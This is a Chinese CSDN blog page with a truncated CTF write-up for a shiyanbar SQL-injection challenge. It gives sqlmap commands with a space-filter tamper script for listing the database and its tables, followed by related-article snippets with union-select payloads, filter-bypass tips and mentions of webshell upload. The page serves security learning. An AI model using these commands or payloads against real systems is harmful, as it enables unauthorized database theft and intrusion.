实验吧 ctf 题目简单的sql注入2writeup

最新推荐文章于 2024-09-11 20:11:09 发布

置顶

ZweLL032

最新推荐文章于 2024-09-11 20:11:09 发布

阅读量6.3k

点赞数

分类专栏： ctf 文章标签： ctf

本文链接：https://blog.csdn.net/ZweLL032/article/details/61429682

版权

本文记录了一个CTF挑战中遇到的SQL注入问题的解决过程，通过输入ID值观察回显，利用sqlmap工具进行注入攻击，逐步揭示了数据库名、表名以及关键的flag列，并最终获取数据。

摘要由CSDN通过智能技术生成

解题链接： http://ctf5.shiyanbar.com/web/index_2.php

1.输入id值，通过回显发现题目应该是进行了空格过滤

2.使用sqlmap进行注入

2.1 python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent --tamper=space2hash.py

--current-db 查看当前数据库名称，返回web1

2.2 python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent --tamper=space2hash.py

--current-db --tables 查看当前数据库名称和数据库里所有的表

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ZweLL032

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密

杨秀璋的专栏

08-06

1万+

上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法，并分享一个简单的暴库案例；本篇文章分享实验吧CFT实战的题目，涉及WEB渗透和隐写术常见题型，包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章，作为在线笔记，希望对入门的博友们有帮助，大神请飘过，谢谢各位看官！

ctf 选择题题库_实验吧CTF题库writeup

weixin_39722070的博客

12-19

1094

2019-04-28题目1.后台登录分值：10 解题参考：https://blog.csdn.net/March97/article/details/81222922打开是一个登录页面查看网页源码，发现提示1 md5($password,true)处存在sql注入点，该函数的作用如下如果某个字符串经过md5('XXX',true)加密之后的结果包含 ‘’or'+数字，即可构造出...

2 条评论您还未登录，请先登录后发表或查看评论

实验吧——SQL注入 Write up(一)

Lemon's blog

08-05

532

前言：之前学习过了联合注入查询、布尔盲注、时间盲注等，这次就通过实验吧的SQL注入题来加强一下。简单的sql注入 输入有回显，且有输入框，那就可以用联合查询的方法来注入题中提示已经过滤了一些关键字，那么就先来查看题中过滤的是哪些关键字 ?id=1 union select order by # 回显结果： union，select等都被过滤而且没有报错说明#也被过滤可以自己建立一个语句...

CTF-sql注入

am_03的博客

08-23

116

在phpstudy里 #为注释密码随便输入的还可以输入admin’#(可注释掉) 注意：有的不让输入特殊字符，因为可以绕过验证在URL处输入网址，在此工具里打开网页，可以点击右上方的扫描网址或者扫描URL 点击后，弹出的信息右键，点击SQL INJECTION POC，在上方点击，可以获取它的web环境，数据库，命令执行，文件读取，文件上传等等在下方点击获取信息可得到更多信息，弹出Version,Server,OS,u...

SQL注入+CTF实例

最新发布

hyq99999的博客

09-11

813

sql注入关联的相关知识+CTF实例

CTF-SQL注入

weixin_44770698的博客

06-16

5325

CTF-SQL注入题目整理

CTF中的SQL注入

weixin_43906500的博客

02-24

370

1 环境配置见文章：https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2

CTF--SQL注入

woshisz0413的博客

11-27

415

SQL注入思路： 1.是否存在SQL注入测试方法：(1)使用单引号’ (2)sqlmap：sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式： (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&&与||绕过过滤) 例:order by 1… SQL绕过过滤方式： (1)某一关键字被过滤:1...

【PTE】承制科技培训SQL注入题目writeup

HkD01L的博客

11-22

851

承制科技的pte培训课程提供的靶场,sql注入题目writeup

【CTF bugku 成绩查询】关于sql注入

zw05011的博客

01-17

681

知识点 sql注入基础原理（超详细） - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中，再在后台 Sql 服务器上解析执行进行的攻击，它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值，确定注入通过1' order by 1#、1' order by 2#直到确定为几列通过联合查询 1' union select database(),user()#进行查询

CTF-SQL注入（Get）

su__xiaoyan的博客

12-22

840

SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理，那么攻击者就可以构造特殊的SQL语句，直接输入数据库引擎执行，获取或修改数据库中的数据。实验环境攻击者：Kali Linux（192.168.100.146）靶机：VMware workstations Pro——Debian 6（32-bit）（192.168.100.132）注意：当前靶机中并没有flag值，需要通过靶机上面的SQL注入漏洞获取数据库中的内容，登陆网站后台，利用网站

CTF-Web SQL注入

weixin_52182264的博客

04-26

4437

sql注入基本情况了解联合查询注入union 报错注入一.sql注入基本信息 1. sql注入方式常见的主要分为三种: 1. 联合查询注入(union) 2. 报错注入 3. 盲注(布尔盲注,时间盲注) 2.注入点提交方式 GET注入提交数据的方式是GET，注入点的位置在GET参数部分。比如有这样的一个链接 http://xxx.com/news.php?id=1 , id 是注入点,一般注入点是url为主。 POST注入使用 POST 方式提交数据，注入点位置在 POST 数据部分，常发生在表单

CTF-sql注入（X-Forwarded-For）

Reaches_r的博客

08-05

310

1.扫描目标IP发现只开了80http服务 2.进去有个登录界面，考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标，扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击（--batch表示自动回应询问）（1）得到数据库名（2）同理得到表名、列名，暴力破解出账户密码 5.登录后台，上传webshell，控制目标，具体步骤参考前面的文章。 ...

ctf题之SQL注入

m0_51644837的博客

12-10

208

CTFer成长之路之CTF中的SQL注入

梦里明明有六趣，觉后空空无大千

02-20

1627

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

CTF-sql注入(get)

不知名白帽的博客

05-24

569

CTF-sql注入(get),实验环境：kali(192.168.20.128),靶机(192.168.20.131)。先探测敏感信息，再用owasp-zap进行漏洞扫描，然后根据漏洞类型，通过sqlmap进行漏洞的漏洞利用，再上传shell反弹权限

CTF—SQL注入（get）

YkingH的博客

07-09

902

CTF—WEB—SQL注入 SQL注入漏洞介绍 sql注入攻击指的是构建特殊的输入作为参数传入Web应用程序，而这些输入大都是sql语法里的一些组合，通过执行sql语句而执行攻击者所要的操作，其主要原因是程序没有细致的过滤用户输入的数据，致使非法数据侵入系统。 sql注入产生的原因，通常表现在：不当的类型处理不安全的数据库配置不合理的查询集处理不当的错误处理转义字符处理不合适多个提交处理不当信息探测扫描主机服务信息及服务版本 nmap -sV 靶机ip地址快速扫描主机全部信息 nmap

CTF入门笔记之SQL注入

qq_37410729的博客

11-01

3164

sql注入

实验吧——(web)简单的SQL注入1、2 writeup

qq_39480875的博客

05-22

566

判断注入类型输入：1 输入：1’ 出现报错，初步猜测这是一个字符型的注入。尝试一些基本的语句：输入： 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤测试了几个关键词以后，发现都被过滤了关键词被过滤：解决方法如下 1大小写交替： Ord...

青少年CTF挑战：SQL注入解题攻略与sqlmap使用

"青少年CTF平台的sql-labs 1-10关的解题方法，包含多种解决方案，包括使用sqlmap和Python脚本，适用于学习sql注入和web安全。" 在sql-labs的前五关中，我们主要涉及到的是SQL注入（SQL Injection）的基本技巧和策略...